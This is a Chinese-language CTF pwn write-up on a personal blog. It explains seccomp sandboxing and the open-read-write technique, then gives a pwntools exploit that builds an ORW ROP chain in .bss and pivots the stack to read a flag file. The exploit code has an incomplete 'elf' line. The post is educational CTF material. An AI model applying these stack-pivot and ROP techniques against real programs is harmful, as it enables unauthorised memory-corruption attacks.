<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="ORWseccompseccomp是linux内核中的一种沙箱机制，其可以限制进程对系统调用的访问，从系统调用号到系统调用的参数都可以进行检查和限制。正常情况下，程序可以使用所有的syscall，但是在开启seccomp后，我们就无法调用那些被禁止的syscall了。 可以用 seccomp-tools 来检查程序的沙箱机制，如下：   当程序启用了 seccomp 禁用了 exeve() 时，我">
<meta property="og:type" content="article">
<meta property="og:title" content="ORW">
<meta property="og:url" content="https://github.com/CharonPt/CharonPt.github.io.git/2021/12/02/ORW/index.html">
<meta property="og:site_name" content="CharonPt的Blog">
<meta property="og:description" content="ORWseccompseccomp是linux内核中的一种沙箱机制，其可以限制进程对系统调用的访问，从系统调用号到系统调用的参数都可以进行检查和限制。正常情况下，程序可以使用所有的syscall，但是在开启seccomp后，我们就无法调用那些被禁止的syscall了。 可以用 seccomp-tools 来检查程序的沙箱机制，如下：   当程序启用了 seccomp 禁用了 exeve() 时，我">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://github.com/2021/12/02/ORW/seccomp.png">
<meta property="og:image" content="https://github.com/2021/12/02/ORW/checksec.jpg">
<meta property="og:image" content="https://github.com/2021/12/02/ORW/main.jpg">
<meta property="og:image" content="https://github.com/2021/12/02/ORW/init.png">
<meta property="og:image" content="https://github.com/2021/12/02/ORW/seccomp.png">
<meta property="og:image" content="https://github.com/2021/12/02/ORW/ORW.jpg">
<meta property="article:published_time" content="2021-12-02T04:07:19.000Z">
<meta property="article:modified_time" content="2021-12-16T07:21:06.711Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="ORW">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2021/12/02/ORW/seccomp.png">

<link rel="canonical" href="https://github.com/CharonPt/CharonPt.github.io.git/2021/12/02/ORW/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>ORW | CharonPt的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">CharonPt的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/CharonPt/CharonPt.github.io.git/2021/12/02/ORW/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="CharonPt的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ORW
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-12-02 12:07:19" itemprop="dateCreated datePublished" datetime="2021-12-02T12:07:19+08:00">2021-12-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-12-16 15:21:06" itemprop="dateModified" datetime="2021-12-16T15:21:06+08:00">2021-12-16</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="ORW"><a href="#ORW" class="headerlink" title="ORW"></a>ORW</h2><h4 id="seccomp"><a href="#seccomp" class="headerlink" title="seccomp"></a>seccomp</h4><p>seccomp是linux内核中的一种沙箱机制，其可以限制进程对系统调用的访问，从系统调用号到系统调用的参数都可以进行检查和限制。正常情况下，程序可以使用所有的syscall，但是在开启seccomp后，我们就无法调用那些被禁止的syscall了。</p>
<p>可以用 seccomp-tools 来检查程序的沙箱机制，如下：</p>
<img src="/2021/12/02/ORW/seccomp.png" class>

<p>当程序启用了 seccomp 禁用了 exeve() 时，我们便无法通过调用 system() 来getshell（system实际上也是调用了execve来实现的），这时我们就需要使用ORW（open、read、write）来将flag打印出来。</p>
<p>简单地说，我们需要构造如下调用函数的rop链：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fd = open(&#x27;flag&#x27;,&#x27;r&#x27;)</span><br><span class="line">read(fd,buf,len)</span><br><span class="line">write(1,buf,len)</span><br></pre></td></tr></table></figure>

<p>关于open()：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">功能：</span><br><span class="line">打开和创建文件（建立一个文件描述符，其他的函数可以通过文件描述符对指定文件进行读取与写入的操作。）</span><br><span class="line"></span><br><span class="line">原型：</span><br><span class="line">int open(const char*pathname,int flags);</span><br><span class="line">int open(const char*pathname,int flags,mode_t mode);</span><br><span class="line">参数说明：</span><br><span class="line">1.pathname</span><br><span class="line">  要打开或创建的目标文件</span><br><span class="line">2.flags</span><br><span class="line">  打开文件时，可以传入多个参数选项，用下面的</span><br><span class="line">  一个或者多个常量进行“或”运算，构成falgs</span><br><span class="line">  参数：</span><br><span class="line">  O_RDONLY:   只读打开</span><br><span class="line">  O_WRONLY:   只写打开</span><br><span class="line">  O_RDWR:     读，写打开</span><br><span class="line">这三个常量，必须制定一个且只能指定一个</span><br><span class="line">  O_CREAT:    若文件不存在，则创建它，需要使</span><br><span class="line">              用mode选项。来指明新文件的访问权限</span><br><span class="line">  O_APPEND:   追加写，如果文件已经有内容，这次打开文件所</span><br><span class="line">              写的数据附加到文件的末尾而不覆盖原来的内容</span><br><span class="line"></span><br><span class="line">ps：open函数具体使用那个，和具体应用场景相关，如目标文件存在，使用两个参数的open，如果目标文件不存在，需要open创建，则第三个参数表示创建文件的默认权限</span><br><span class="line"></span><br><span class="line">返回值：</span><br><span class="line">成功：新打开的文件描述符</span><br><span class="line">失败：-1</span><br><span class="line">open返回的文件描述符一定是最小的而且没有被使用的</span><br></pre></td></tr></table></figure>

<h4 id="一道例题"><a href="#一道例题" class="headerlink" title="一道例题"></a>一道例题</h4><p>程序保护如下：</p>
<img src="/2021/12/02/ORW/checksec.jpg" class>

<p>程序主逻辑如下：</p>
<img src="/2021/12/02/ORW/main.jpg" class>

<p>程序利用seccomp开启了沙箱保护，如下：</p>
<img src="/2021/12/02/ORW/init.png" class>

<img src="/2021/12/02/ORW/seccomp.png" class>

<p>分析：</p>
<p>因为沙箱将 execve() 禁用了，所以我们不能通过正常方法getshell，可以看到我们的第一次输入可以在.bss段中输入 0x100 个字节的内容，且第三个 read() 存在 0x10 个字节的栈溢出，所以我们可以先将ORW的rop链写入到.bss段中，然后利用栈迁移将栈迁移到我们写rop链的地方执行即可打印出flag。</p>
<p>我们结合exp来解释，如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">p = process(&#x27;./ROP&#x27;)</span><br><span class="line">elf </span><br><span class="line"></span><br><span class="line">leave_ret=0x40090d</span><br><span class="line">pop_rdi_ret=0x400a43</span><br><span class="line">flag_addr=0x601170</span><br><span class="line">pop_rsi_r15_ret=0x400a41</span><br><span class="line"></span><br><span class="line">#bss_start = 0x6010A0</span><br><span class="line">payload=p64(0x06010A0+0x100)+p64(pop_rdi_ret)+p64(0x06010A0+0x80)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(elf.plt[&quot;open&quot;])</span><br><span class="line">payload+=p64(pop_rdi_ret)+p64(4)+p64(pop_rsi_r15_ret)+p64(flag_addr)+p64(0)+p64(elf.plt[&#x27;read&#x27;])</span><br><span class="line">payload+=p64(pop_rdi_ret)+p64(flag_addr)+p64(elf.plt[&#x27;puts&#x27;])+p64(u64(&quot;flag&quot;.ljust(8,&quot;\x00&quot;)))</span><br><span class="line">print &quot;payloadlen=&gt;&quot;,hex(len(payload))</span><br><span class="line">p.sendlineafter(&quot;think so?\n&quot;,payload)</span><br><span class="line"></span><br><span class="line">payload=&quot;A&quot;*80+p64(0x06010A0)+p64(leave_ret)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>第一步我们构造的ORW链在.bss段中如下图：</p>
<img src="/2021/12/02/ORW/ORW.jpg" class>

<p>因为在栈迁移的过程中leave指令要pop ebp，所以我们需要放入一个抬ebp的地址在rop链中，剩下的构造便是我们分别调用了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">open(&#x27;flag&#x27;,0)</span><br><span class="line">read(4,flag_addr,?)</span><br><span class="line">puts(flag_addr)</span><br></pre></td></tr></table></figure>

<p>这三个函数来将flag文件中的内容打印出来</p>
<p>①payload中 open() 的第一个参数为 bss+0x80 处，是我们payload中的’flag’字符串的地址，需要计算payload的长度得出，</p>
<p>②关于文件描述符，我们知道正常情况下0、1、2三个文件描述符都被占用且对应标准输入，标准输出，标准错误。且open()函数创建的文件描述符一定是最小且未被占用的，我们可以看到 main() 中有利用 open() 函数打开 “some_life_experience”的操作，所以如果远端的对应目录下存在该文件的话，文件描述符3将被程序创建。所以我们构造的ORW中的 open() 创建的文件描述符应该是4，这就是 read() 第一个参数是4的原因。（用该exp在本地打的话，因为我们的本地没有 “some_life_experience” 这个文件，所以文件描述符3不会被创建，所以在本地打的话 read() 第一个参数应该改为3，或者手动创建一个 “some_life_experience” 文件）</p>
<p>③read() 的第二个参数 flag_addr 由我们任意选择，只要保证能读进去且不破坏程序执行即可。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/ORW/" rel="tag"># ORW</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/12/01/%E4%BD%BF%E7%94%A8mprotect%E6%8F%90%E5%8D%87%E6%9D%83%E9%99%90/" rel="prev" title="使用mprotect提升权限">
      <i class="fa fa-chevron-left"></i> 使用mprotect提升权限
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/12/05/2017%E6%B9%96%E6%B9%98%E6%9D%AF-pwn100/" rel="next" title="2017湖湘杯-pwn100">
      2017湖湘杯-pwn100 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#ORW"><span class="nav-number">1.</span> <span class="nav-text">ORW</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#seccomp"><span class="nav-number">1.0.1.</span> <span class="nav-text">seccomp</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E9%81%93%E4%BE%8B%E9%A2%98"><span class="nav-number">1.0.2.</span> <span class="nav-text">一道例题</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">28</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
